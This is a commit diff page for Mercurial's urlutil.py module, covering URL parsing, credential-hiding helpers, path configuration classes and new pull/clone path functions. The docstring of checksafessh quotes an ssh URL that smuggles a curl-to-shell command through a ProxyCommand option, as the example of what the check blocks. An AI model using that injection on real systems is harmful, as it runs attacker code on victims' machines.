##// END OF EJS Templates
urlutil: add a new `get_unique_pull_path`...
marmoute -
r47698:1998a831 default
parent child Browse files
Show More
@@ -1,719 +1,735
1 # utils.urlutil - code related to [paths] management
1 # utils.urlutil - code related to [paths] management
2 #
2 #
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 import os
7 import os
8 import re as remod
8 import re as remod
9 import socket
9 import socket
10
10
11 from ..i18n import _
11 from ..i18n import _
12 from ..pycompat import (
12 from ..pycompat import (
13 getattr,
13 getattr,
14 setattr,
14 setattr,
15 )
15 )
16 from .. import (
16 from .. import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pycompat,
19 pycompat,
20 urllibcompat,
20 urllibcompat,
21 )
21 )
22
22
23
23
24 if pycompat.TYPE_CHECKING:
24 if pycompat.TYPE_CHECKING:
25 from typing import (
25 from typing import (
26 Union,
26 Union,
27 )
27 )
28
28
29 urlreq = urllibcompat.urlreq
29 urlreq = urllibcompat.urlreq
30
30
31
31
def getport(port):
    # type: (Union[bytes, int]) -> int
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    # Numeric values (ints, or strings made of digits) need no lookup.
    try:
        return int(port)
    except ValueError:
        pass

    # Otherwise treat the value as a service name (e.g. b'http').
    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(
            _(b"no port number associated with service '%s'") % port
        )
51
51
52
52
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # Characters left unquoted in the user and password components.
    _safechars = b"!~*'()+"
    # Characters left unquoted in the path and fragment components.
    _safepchars = b"/!~*'()+:\\"
    # Matches a leading "<scheme>:" prefix.
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # type: (bytes, bool, bool) -> None
        """Parse ``path`` into its URL components.

        ``parsequery`` and ``parsefragment`` control whether ``?query`` and
        ``#fragment`` are split off (see the class docstring).

        Raises error.Abort for a ``file://`` URL whose host is not one of
        ``localhost``, ``127.0.0.1`` or ``[::1]``.
        """
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self):
        """Return a new ``url`` carrying the same components as this one."""
        # The constructor argument is a placeholder: every parsed attribute
        # is overwritten below.
        u = url(b'temporary useless value')
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        # The port must be copied too, otherwise the copy of a URL with an
        # explicit port silently loses it.
        u.port = self.port
        u.path = self.path
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        """Return ``<url name: value, ...>`` listing every non-None component."""
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        # Local paths (and bundle: paths) are emitted without any quoting.
        if self._localpath:
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            # Bracketed (IPv6 literal) hosts are emitted verbatim.
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return ``(url, authinfo)`` with credentials stripped from ``url``.

        ``url`` is this URL rendered without user and password. ``authinfo``
        is None when there is no user, otherwise the tuple
        ``(None, (url, host), user, passwd or b'')``.
        """
        user, passwd = self.user, self.passwd
        try:
            # Temporarily drop the credentials so bytes(self) omits them.
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        """Tell whether this URL is absolute (remote, or an absolute path)."""
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        # type: () -> bytes
        """Return the filesystem path this URL designates.

        For ``file`` and ``bundle`` schemes the path is rebuilt from the
        parsed components; for anything else the original, unparsed string
        is returned.
        """
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
395 )
396
396
397
397
def hasscheme(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` parses as a URL with a non-empty scheme."""
    return bool(url(path).scheme)  # cast to help pytype
401
401
402
402
def hasdriveletter(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` starts with a drive letter such as ``c:``.

    Empty or None input yields False.
    """
    # Slices (rather than indexing) keep the comparison bytes-to-bytes and
    # are safe on inputs shorter than two characters.
    return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
406
406
407
407
def urllocalpath(path):
    # type: (bytes) -> bytes
    """Return the local filesystem path designated by ``path``.

    The value is parsed with query and fragment splitting disabled, so any
    ``?`` or ``#`` stays part of the path.
    """
    return url(path, parsequery=False, parsefragment=False).localpath()
411
411
412
412
def checksafessh(path):
    # type: (bytes) -> None
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    # Unquote first so a percent-encoded leading '-' is caught as well.
    path = urlreq.unquote(path)
    if path.startswith((b'ssh://-', b'svn+ssh://-')):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
        )
429
429
430
430
def hidepassword(u):
    # type: (bytes) -> bytes
    '''hide user credential in a url string'''
    parsed = url(u)
    # Only mask a password that is actually present.
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
438
438
439
439
def removeauth(u):
    # type: (bytes) -> bytes
    '''remove all authentication information from a url string'''
    parsed = url(u)
    parsed.user = parsed.passwd = None
    return bytes(parsed)
446
446
447
447
def get_push_paths(repo, ui, dests):
    """yields all the `path` selected as push destination by `dests`

    When `dests` is empty, the `default-push` entry of `ui.paths` is used,
    falling back to `default`; error.ConfigError is raised if neither is
    configured. Otherwise each destination is resolved with `ui.getpath`.

    `repo` is currently unused.
    """
    if not dests:
        if b'default-push' in ui.paths:
            yield ui.paths[b'default-push']
        elif b'default' in ui.paths:
            yield ui.paths[b'default']
        else:
            raise error.ConfigError(
                _(b'default repository not configured!'),
                hint=_(b"see 'hg help config.paths'"),
            )
    else:
        for dest in dests:
            yield ui.getpath(dest)
463
463
464
464
def get_pull_paths(repo, ui, sources, default_branches=()):
    """yields all the `(path, branch)` selected as pull source by `sources`

    When `sources` is empty, the `default` path is used. Each source is
    expanded with `ui.expandpath` and then split by `parseurl`.

    `repo` is currently unused.
    """
    if not sources:
        sources = [b'default']
    for source in sources:
        # Named `expanded` so the module-level `url` class is not shadowed.
        expanded = ui.expandpath(source)
        yield parseurl(expanded, default_branches)
472
472
473
473
def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
    """return a unique `(path, branch)` or abort if multiple are found

    This is useful for commands and actions that do not support multiple
    sources (yet).

    Note that for now, a source cannot expand to multiple paths, so this
    function is "trivial": it never aborts by itself and simply resolves
    `source` (or `default` when `source` is None).

    The `action` parameter is meant to be used for the error message; it is
    not used yet, and neither is `repo`.
    """
    if source is None:
        source = b'default'
    # Named `expanded` so the module-level `url` class is not shadowed.
    expanded = ui.expandpath(source)
    return parseurl(expanded, default_branches)
488
489
def get_clone_path(ui, source, default_branches=()):
    """return the `(origsource, path, branch)` selected as clone source

    `origsource` is `source` as expanded by `ui.expandpath`; `path` and
    `branch` are what `parseurl` extracts from it.
    """
    # Named `origsource` so the module-level `url` class is not shadowed.
    origsource = ui.expandpath(source)
    path, branch = parseurl(origsource, default_branches)
    return origsource, path, branch
479
495
480
496
def parseurl(path, branches=None):
    """parse url#branch, returning (url, (branch, branches))

    The fragment, when non-empty, is taken as the branch and removed from
    the returned url. `branches` is passed through, with a falsy value
    replaced by an empty list.
    """
    u = url(path)
    branch = None
    if u.fragment:
        branch = u.fragment
        u.fragment = None
    return bytes(u), (branch, branches or [])
489
505
490
506
class paths(dict):
    """Represents a collection of paths and their configs.

    Data is initially derived from ui instances and the config files they have
    loaded.
    """

    def __init__(self, ui):
        """Populate the mapping from the ``[paths]`` section of ``ui``."""
        dict.__init__(self)

        for name, loc in ui.configitems(b'paths', ignoresub=True):
            # No location is the same as not existing.
            if not loc:
                continue
            loc, sub_opts = ui.configsuboptions(b'paths', name)
            self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)

        # Second pass, in sorted name order, once every path is registered.
        for name, p in sorted(self.items()):
            p.chain_path(ui, self)

    def getpath(self, ui, name, default=None):
        """Return a ``path`` from a string, falling back to default.

        ``name`` can be a named path or locations. Locations are filesystem
        paths or URIs.

        When ``name`` is None, the first entry of ``default`` (a single name
        or a tuple/list of names) that is a registered path is returned, or
        None if there is none. An empty ``name`` also returns None.

        Raises error.RepoError when ``name`` is neither a registered path
        nor something ``path`` accepts as a location.
        """
        # Only fall back to default if no path was requested.
        if name is None:
            if not default:
                default = ()
            elif not isinstance(default, (tuple, list)):
                default = (default,)
            for k in default:
                try:
                    return self[k]
                except KeyError:
                    continue
            return None

        # Most likely empty string.
        # This may need to raise in the future.
        if not name:
            return None

        try:
            return self[name]
        except KeyError:
            # Try to resolve as a local path or URI.
            try:
                # we pass the ui instance as warnings might need to be issued
                return path(ui, None, rawloc=name)
            except ValueError:
                raise error.RepoError(_(b'repository %s does not exist') % name)
547
563
548
564
# Registry of path sub-options: maps the sub-option name to a pair
# ``(attribute name, function)``; filled in by ``pathsuboption``.
_pathsuboptions = {}


def pathsuboption(option, attr):
    """Decorator used to declare a path sub-option.

    Arguments are the sub-option name and the attribute it should set on
    ``path`` instances.

    The decorated function will receive as arguments a ``ui`` instance,
    ``path`` instance, and the string value of this option from the config.
    The function should return the value that will be set on the ``path``
    instance.

    This decorator can be used to perform additional verification of
    sub-options and to change the type of sub-options.
    """

    def register(func):
        # Record the handler and hand the function back unchanged.
        _pathsuboptions[option] = (attr, func)
        return func

    return register
572
588
573
589
@pathsuboption(b'pushurl', b'pushloc')
def pushurlpathoption(ui, path, value):
    """Process the ``pushurl`` sub-option of ``path``.

    Returns the push location as bytes, or ``None`` (after emitting a
    warning through ``ui``) when ``value`` has no URL scheme.  A
    ``#fragment`` in the value is dropped with a warning.
    """
    parsed = url(value)

    # A push location must be an actual URL, i.e. it needs a scheme.
    if not parsed.scheme:
        message = _(b'(paths.%s:pushurl not a URL; ignoring)\n')
        ui.warn(message % path.name)
        return None

    # The #foo syntax for declaring the branch to push is not supported in
    # push URLs: warn and strip it.
    if parsed.fragment:
        message = _(
            b'("#fragment" in paths.%s:pushurl not supported; '
            b'ignoring)\n'
        )
        ui.warn(message % path.name)
        parsed.fragment = None

    return bytes(parsed)
595
611
596
612
@pathsuboption(b'pushrev', b'pushrev')
def pushrevpathoption(ui, path, value):
    """Process the ``pushrev`` sub-option: the config value is kept as is."""
    return value
600
616
601
617
class path(object):
    """A single configured path together with its sub-options."""

    def __init__(self, ui, name, rawloc=None, suboptions=None):
        """Build a path out of its config values.

        ``ui`` is the ``ui`` instance the path comes from.
        ``name`` is the symbolic name of the path (may be None).
        ``rawloc`` is the raw location, as written in the config.
        ``suboptions`` is an optional dict of sub-options specific to this
        path; they are layered on top of the ``paths.*`` sub-options.

        ``ValueError`` is raised when ``rawloc`` is empty, and also when no
        ``name`` is given and the location is neither a URL nor a local
        filesystem path containing a ``.hg`` directory.
        """
        if not rawloc:
            raise ValueError(b'rawloc must be defined')

        # A location may select a branch with the <base>#<branch> syntax;
        # the branch is kept apart and removed from the URL itself.
        parsed = url(rawloc)
        branch = parsed.fragment or None
        if branch is not None:
            parsed.fragment = None

        self.url = parsed
        # the url from the config/command line, before any `path://`
        # indirection gets resolved
        self.raw_url = parsed.copy()
        self.branch = branch

        self.name = name
        self.rawloc = rawloc
        self.loc = b'%s' % parsed

        self._validate_path()

        # Start from the sub-options of the `*` entry, then let the ones
        # given for this very path take precedence.
        _unused, merged = ui.configsuboptions(b'paths', b'*')
        own = {}
        if suboptions is not None:
            own = suboptions.copy()
            merged.update(suboptions)
        self._own_sub_opts = own
        self._all_sub_opts = merged.copy()

        self._apply_suboptions(ui, merged)

    def chain_path(self, ui, paths):
        """Resolve a ``path://<name>`` location against ``paths``.

        Nothing happens unless the URL scheme is ``path``.  Otherwise the
        url, location and sub-options of the referenced path are adopted;
        a branch and sub-options set on this path win over the referenced
        ones.  ``error.Abort`` is raised when the referenced name is
        unknown or is itself a ``path://`` location.
        """
        if self.url.scheme != b'path':
            return

        assert self.url.path is None
        target = self.url.host
        try:
            subpath = paths[target]
        except KeyError:
            msg = _(b'cannot use `%s`, "%s" is not a known path')
            raise error.Abort(msg % (self.rawloc, target))

        # Only one level of indirection is supported.
        if subpath.raw_url.scheme == b'path':
            msg = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
            raise error.Abort(msg % (self.rawloc, target))

        self.url = subpath.url
        self.rawloc = subpath.rawloc
        self.loc = subpath.loc
        if self.branch is not None:
            # Keep our own branch: substitute it for whatever fragment the
            # referenced raw location carries.
            base = self.rawloc.rsplit(b'#', 1)[0]
            self.rawloc = b'%s#%s' % (base, self.branch)
        else:
            self.branch = subpath.branch

        combined = subpath._all_sub_opts.copy()
        combined.update(self._own_sub_opts)
        self._apply_suboptions(ui, combined)

    def _validate_path(self):
        """Raise ``ValueError`` for an unnamed, unusable location.

        Named paths and locations with a URL scheme are accepted as is;
        anything else has to pass ``_isvalidlocalpath``.
        """
        if self.name or self.url.scheme:
            return
        if self._isvalidlocalpath(self.loc):
            return
        raise ValueError(
            b'location is not a URL or path to a local '
            b'repo: %s' % self.rawloc
        )

    def _apply_suboptions(self, ui, sub_options):
        """Set one attribute per registered sub-option on this instance.

        Every registered sub-option always gets its attribute: the value
        computed by its handler when the sub-option is present in
        ``sub_options``, None otherwise.
        """
        for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
            if suboption in sub_options:
                value = func(ui, self, sub_options[suboption])
            else:
                value = None
            setattr(self, attr, value)

    def _isvalidlocalpath(self, path):
        """Tell whether ``path`` may be a valid local repository.

        Kept as a separate method so that extensions can redefine what
        'valid' means here (for instance when pulling from a git repo into
        a hg one)."""
        try:
            candidate = os.path.join(path, b'.hg')
            return os.path.isdir(candidate)
        # Python 2 may raise TypeError. Python 3, ValueError.
        except (TypeError, ValueError):
            return False

    @property
    def suboptions(self):
        """Sub-options of this path mapped to their values.

        Sub-options whose value is None are left out.  Meant for
        presentation purposes.
        """
        pairs = (
            (subopt, getattr(self, attr))
            for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions)
        )
        return {subopt: value for subopt, value in pairs if value is not None}
General Comments 0
You need to be logged in to leave comments. Login now